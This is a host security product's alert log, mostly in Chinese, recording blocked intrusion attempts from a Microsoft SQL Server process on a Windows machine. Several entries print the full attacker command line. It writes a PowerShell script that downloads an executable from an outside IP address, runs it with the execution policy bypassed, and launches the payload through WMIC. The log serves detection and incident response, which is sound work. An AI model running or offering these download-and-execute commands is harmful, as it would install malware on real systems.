cmd.exe violates the application hardening rule
【1】2022-11-03 08:23:40,系统防护,系统加固,cmd.exe触犯敏感动作防护规则, 已阻止
防护项目:通过WMIC启动可疑进程
执行文件:C:\Windows\System32\wbem\WMIC.exe
执行命令行:WMIC process call create "C:\Windows\TEMP\ZE4O9H72.exe"
操作结果:已阻止
进程ID:6740
操作进程:C:\Windows\System32\cmd.exe
操作进程命令行:"C:\Windows\System32\cmd.exe" /C "echo $client = New-Object System.Net.WebClient > C:\Windows\TEMP\update.ps1 & echo $client.DownloadFile("http://80.66.75.25/arx1-Uchenmk.exe","C:\Windows\TEMP\ZE4O9H72.exe") >> C:\Windows\TEMP\update.ps1 & powershell -ExecutionPolicy Bypass C:\Windows\TEMP\update.ps1 & WMIC process call create "C:\Windows\TEMP\ZE4O9H72.exe""
操作进程校验和:0F3C4FF28F354AEDE202D54E9D1C5529A3BF87D8
父进程ID:1824
父进程:D:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
父进程命令行:"D:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【2】2022-11-03 08:23:24,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\wbem\WMIC.exe
操作目标参数:WMIC process call create "C:\Windows\TEMP\ZE4O9H72.exe"
操作结果:已阻止
保护进程路径:D:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"D:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【3】2022-11-03 08:22:55,系统防护,系统加固,cmd.exe触犯敏感动作防护规则, 已阻止
防护项目:通过WMIC启动可疑进程
执行文件:C:\Windows\System32\wbem\WMIC.exe
执行命令行:WMIC process call create "C:\Windows\TEMP\U2QWE354.exe"
操作结果:已阻止
进程ID:8144
操作进程:C:\Windows\System32\cmd.exe
操作进程命令行:"C:\Windows\system32\cmd.exe" /c "echo $client = New-Object System.Net.WebClient > %TEMP%\update.ps1 & echo $client.DownloadFile("http://80.66.75.25/arx1-Uchenmk.exe","%TEMP%\U2QWE354.exe") >> %TEMP%\update.ps1 & powershell -ExecutionPolicy Bypass %temp%\update.ps1 & WMIC process call create "%TEMP%\U2QWE354.exe""
操作进程校验和:0F3C4FF28F354AEDE202D54E9D1C5529A3BF87D8
父进程ID:1824
父进程:D:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
父进程命令行:"D:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【4】2022-11-03 08:22:39,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\wbem\WMIC.exe
操作目标参数:WMIC process call create "C:\Windows\TEMP\U2QWE354.exe"
操作结果:已阻止
保护进程路径:D:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"D:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【5】2022-11-03 08:21:54,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作目标参数:powershell -ExecutionPolicy Bypass C:\Windows\TEMP\update.ps1
操作结果:已阻止
保护进程路径:D:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"D:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【6】2022-11-03 08:21:11,病毒防护,文件实时监控,发现病毒HEUR:TrojanDownloader/PowerShell.Agent.a, 已处理
病毒名称:HEUR:TrojanDownloader/PowerShell.Agent.a
病毒ID:76CE49D5BC4CB654
病毒路径:C:\Windows\Temp\update.ps1
操作类型:执行
操作结果:已处理
进程ID:5828
操作进程:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作进程命令行:powershell -ExecutionPolicy Bypass C:\Windows\TEMP\update.ps1
父进程:C:\Windows\System32\cmd.exe
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>